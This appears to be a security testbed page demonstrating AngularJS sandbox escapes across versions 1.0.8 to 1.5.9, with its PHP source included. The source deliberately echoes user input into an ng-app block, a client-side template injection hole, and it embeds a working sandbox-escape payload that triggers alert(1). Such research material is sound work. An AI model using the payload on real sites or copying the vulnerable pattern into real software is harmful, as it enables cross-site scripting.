Testbed for Angular JS version 1.5.7

hidden 1.4.7

Angular JS Expression:
hello world

version: 1.0.8, 1.4.7, 1.5.7, 1.5.8, fix (1.5.9)

<html>
    <head> 
        <meta charset="utf-8">
        <title>1.5.9 AngularJS Sandbox Demo</title>
        <script src="angular.fix.js"></script>
        <style>
        .showme, .showhim:hover .ok{ display: none; }
        .showhim:hover .showme{ display : block; }
        </style>
    </head>
    <body>
        <h3>Testbed for Angular JS version 1.5.7</h3>
        <form action="angular.fix.php">
            <input type="text" size="70" name="q" value="<?php echo htmlspecialchars($_GET['q'],ENT_QUOTES); ?>">
            <input type="submit" value="go">
        </form>
        <div class="showhim">
           <div class="showme"><input type="text" size=70 value="{{'a'.constructor.prototype.charAt='a'.concat; $eval('exploit=1} } };alert(1)//');}}"></div>
           <div class="ok"><i>hidden 1.4.7</i></div>
        </div>
        <hr/>

            <b>Angular JS Expression:</b>
            <!-- start of AngularJS app -->
            <div ng-app>

<?php
    
// GET parameter ?q= mit sicherem escaping
    
$q $_GET['q'];
    echo 
htmlspecialchars($q,ENT_QUOTES);
?>


            </div>
            <!-- end of AngularJS app -->
        <hr/>
        <p>
            version: <a href="angular1.0.8.php?q=hello%20world">1.0.8</a>, <a href="angular1.4.7.php?q=hello%20world">1.4.7</a>, <a href="angular1.5.7.php?q=hello%20world">1.5.7</a>, <a href="angular1.5.8.php?q=hello%20world">1.5.8</a>, <a href="angular.fix.php?q=hello%20world">fix (1.5.9)</a>
        </p>
        <div style="margin-top: 150px">
            <code>
            <?php
                show_source
(__FILE__);    
            
?>
            </code>
        </div>
    </body>
</html>